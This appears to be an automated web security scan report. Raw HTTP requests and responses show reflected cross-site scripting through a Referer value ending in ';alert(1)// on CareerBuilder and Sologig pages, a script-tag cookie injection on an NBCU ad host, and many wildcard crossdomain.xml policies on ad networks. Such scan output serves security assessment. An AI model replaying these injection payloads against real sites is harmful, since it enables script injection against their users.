HTTP/1.1 200 OK Cache-Control: private Content-Length: 51678 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: BEAR23 Date: Sun, 04 Sep 2011 01:25:27 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... eName='JS_Home - '; s_cb.server='www'; s_cb.channel='JS_Home'; s_cb.eVar11='NotRegi s_cb.eVar15='NO s_cb.eVar16='natural (google) - 760d3\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /JobPoster/Products |
GET /JobPoster/Products Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 36528 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: BEAR36 Date: Sun, 04 Sep 2011 01:25:35 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... ntent'; s_cb.events='scOpen'; s_cb.prop1='SMB s_cb.eVar11='NotRegi s_cb.eVar15='NO s_cb.eVar17='natural (google) - ae719\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /JobSeeker/Jobs |
GET /JobSeeker/Jobs Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 31143 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: BEAR3 Date: Sun, 04 Sep 2011 01:25:46 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... s_cb.channel='JS_FindJobs s_cb.prop1='My Job Recommendations'; s_cb.eVar11='NotRegi s_cb.eVar15='NO s_cb.eVar16='natural (google) - f332d\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /JobSeeker/Jobs/JobQuery |
GET /JobSeeker/Jobs/JobQuery Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 185170 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ Set-Cookie: jobresults.aspx:mxdl41=pg X-Powered-By: ASP.NET X-PBY: BEAR6 Date: Sun, 04 Sep 2011 01:26:00 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... ='Job Results'; s_cb.eVar5='JS_AS_Job Type'; s_cb.eVar11='NotRegi s_cb.eVar14=', '; s_cb.eVar15='NO s_cb.eVar16='natural (google) - 99c17\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /JobSeeker/Resumes |
GET /JobSeeker/Resumes Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 34386 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: BEARWEB54 Date: Sun, 04 Sep 2011 01:25:35 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... Resumes - '; s_cb.server='www'; s_cb.channel='JS s_cb.eVar11='NotRegi s_cb.eVar15='NO s_cb.eVar16='natural (google) - 5782b\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /Jobseeker/Jobs |
GET /Jobseeker/Jobs Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 182684 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ Set-Cookie: jobresults.aspx:mxdl41=pg X-Powered-By: ASP.NET X-PBY: BEAR25 Date: Sun, 04 Sep 2011 01:25:46 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... ='Job Results'; s_cb.eVar5='JS_AS_Job Type'; s_cb.eVar11='NotRegi s_cb.eVar14=', '; s_cb.eVar15='NO s_cb.eVar16='natural (google) - 19088\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /PLI/R/JSToolkit.htm |
GET /PLI/R/JSToolkit.htm HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35980 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: BEAR5 Date: Sun, 04 Sep 2011 01:25:43 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... rver='www'; s_cb.channel='JS s_cb.prop1='Toolkit'; s_cb.eVar11='NotRegi s_cb.eVar15='NO s_cb.eVar16='natural (google) - a46ea\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /jobseeker/companies |
GET /jobseeker/companies Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 242490 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: BEAR25 Date: Sun, 04 Sep 2011 01:26:28 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... '; s_cb.channel='JS_FindJobs s_cb.prop1='Search By Company'; s_cb.eVar11='NotRegi s_cb.eVar15='NO s_cb.eVar16='natural (google) - ac754\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /jobseeker/jobs |
GET /jobseeker/jobs Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 50891 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: BEAR28 Date: Sun, 04 Sep 2011 01:25:25 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... s_cb.channel='JS_FindJobs s_cb.prop1='Advanced Search - AL'; s_cb.eVar11='NotRegi s_cb.eVar15='NO s_cb.eVar16='natural (google) - 29a9c\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.sologig.com |
Path: | / |
GET / HTTP/1.1 Host: www.sologig.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 27472 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http:/ X-Powered-By: ASP.NET X-PBY: REBEL8 Date: Sun, 04 Sep 2011 01:27:57 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="HTMLTag" xmlns="http://www.w3.org ...[SNIP]... me - '; s_cb.server='www.sologig s_cb.channel='js_home'; s_cb.eVar11='NotRegi s_cb.eVar15='NO s_cb.eVar16='natural (google) - daacc\\';alert(1)/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4462/5032/7102-2.html |
GET /a/4462/5032/7102-2.html HTTP/1.1 Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:45:24 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:24 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:24 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=5032^28&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112475; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3152805.js^1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: text/html Content-Length: 1325 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <style type="text/css"> body {margin:0px; padding:0px;} </style> <script type="tex ...[SNIP]... <img src="http://trgca.opt ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/6291/9346/15214-15.js |
GET /a/6291/9346/15214-15.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.sacbee.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXh |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:05:10 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:10 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 02:05:10 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=5032^1630e6e48 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 2014 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3150791" ...[SNIP]... <img src=\"http://trgca.opt ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/6291/9346/15214-2.js |
GET /a/6291/9346/15214-2.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.sacbee.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:01:33 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:33 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 02:01:33 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=5032^1630e6e488 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 2014 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3150789" ...[SNIP]... <img src=\"http://trgca.opt ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.nbcudigit |
Path: | /hosted/util/getRemo |
GET /hosted/util/getRemo Host: www.nbcudigitaladops.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: xa=n6a7e7<script>alert(1)< |
HTTP/1.1 200 OK Server: Apache Content-Length: 152 Content-Type: application/javascript ETag: "15f491-44-4aacd3f4ef780" Expires: Sun, 04 Sep 2011 00:52:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 00:52:44 GMT Connection: close __nbcadops_xasis |
Severity: | High |
Confidence: | Certain |
Host: | http://a.tribalfusion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.tribalfusion.com |
HTTP/1.0 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 X-Reuse-Index: 1 Content-Type: text/xml Content-Length: 102 Connection: Close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.afy11.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.afy11.net |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT Accept-Ranges: bytes ETag: "e732374a5649c71:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 01:21:07 GMT Connection: close Content-Length: 201 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT Date: Sun, 04 Sep 2011 01:21:13 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.doubleclick <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.turn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Sun, 04 Sep 2011 01:05:49 GMT Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 01:05:49 GMT Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: admeld.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:01:37 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120 Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://admin.brightcove |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: admin.brightcove.com |
HTTP/1.0 200 OK Server: Apache ETag: "4fbbc6624625a7f4c27 Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT Accept-Ranges: bytes Content-Length: 386 Content-Type: application/xml Cache-Control: max-age=1200 Date: Sun, 04 Sep 2011 01:06:33 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.undertone.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ads.undertone.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Mon, 29 Aug 2011 20:44:50 GMT ETag: "52206e9-fc-4abaaf7619480 Content-Type: text/xml Date: Sun, 04 Sep 2011 00:45:04 GMT Content-Length: 252 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.undertone.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: altfarm.mediaplex.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"204-1158796163000" Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT Content-Type: text/xml Content-Length: 204 Date: Sun, 04 Sep 2011 00:45:21 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.affinesystems |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.affinesystems.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:21:56 GMT Server: Apache/2.2.16 (Debian) Last-Modified: Fri, 17 Jun 2011 17:02:20 GMT ETag: "b8e352-cc-4a5eb593e5f00" Accept-Ranges: bytes Content-Length: 204 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.bit.ly |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.bit.ly |
HTTP/1.1 200 OK Server: nginx Date: Sun, 04 Sep 2011 00:45:49 GMT Content-Type: text/xml Content-Length: 141 Last-Modified: Wed, 25 May 2011 20:29:51 GMT Connection: close Expires: Tue, 06 Sep 2011 00:45:49 GMT Cache-Control: max-age=172800 Accept-Ranges: bytes <?xml version="1.0"?> <!-- http://bit.ly/crossdomain <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://as.casalemedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: as.casalemedia.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT ETag: "15690dc-e6-1230c1c0" Accept-Ranges: bytes Content-Length: 230 Content-Type: text/xml Expires: Sun, 04 Sep 2011 01:02:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 01:02:07 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Casale Media --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://audit.303br.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: audit.303br.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"202-1313613444000" Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT Content-Type: application/xml Content-Length: 202 Date: Sun, 04 Sep 2011 00:45:12 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Mon, 05 Sep 2011 00:42:17 GMT Date: Sun, 04 Sep 2011 00:42:17 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bh.contextweb.com |
HTTP/1.1 200 OK X-Powered-By: Servlet/3.0 Server: GlassFish v3 Accept-Ranges: bytes ETag: W/"269-1314729062000" Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT Content-Type: application/xml Content-Length: 269 Date: Sun, 04 Sep 2011 01:21:59 GMT Connection: Keep-Alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c.brightcove.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c.brightcove.com |
HTTP/1.1 200 OK X-BC-Client-IP: 50.23.123.106 X-BC-Connecting-IP: 50.23.123.106 Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC Cache-Control: must-revalidate,max-age=0 Content-Type: application/xml Content-Length: 387 Date: Sun, 04 Sep 2011 01:06:09 GMT Connection: keep-alive Server: <?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c5.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c5.zedo.com |
HTTP/1.0 200 OK Server: ZEDO 3G Last-Modified: Mon, 19 May 2008 09:04:15 GMT ETag: "77adf2-f7-44d91a5da81c0" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Content-Type: application/xml Content-Length: 247 Date: Sun, 04 Sep 2011 01:22:05 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c7.zedo.com |
HTTP/1.0 200 OK Server: ZEDO 3G Content-Length: 247 Content-Type: application/xml ETag: "77adf2-f7-44d91a5da81c0" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=6536 Date: Sun, 04 Sep 2011 01:04:27 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.cinesport.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.cinesport.com |
HTTP/1.0 200 OK x-amz-id-2: aEaeSUpc60vkN5xGlJj7 x-amz-request-id: 521035425F0CA074 Date: Tue, 22 Mar 2011 22:58:30 GMT x-amz-meta-s3fox-filesize x-amz-meta-s3fox Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT ETag: "199ac761aefc6dd7852 Accept-Ranges: bytes Content-Type: text/xml Content-Length: 204 Server: AmazonS3 Age: 4964 X-Cache: Hit from cloudfront X-Amz-Cf-Id: 458df1119b180bde4aa2 Via: 1.0 2ba8d32c0ef1d73da2fc Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-pol ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.gigya.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.gigya.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT ETag: "80b2ea66b4efcb1:0" Server: Microsoft-IIS/7.5 X-Server: web103 Cache-Control: max-age=86400 Date: Sun, 04 Sep 2011 00:42:57 GMT Content-Length: 355 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.taboolasy |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.taboolasyndication |
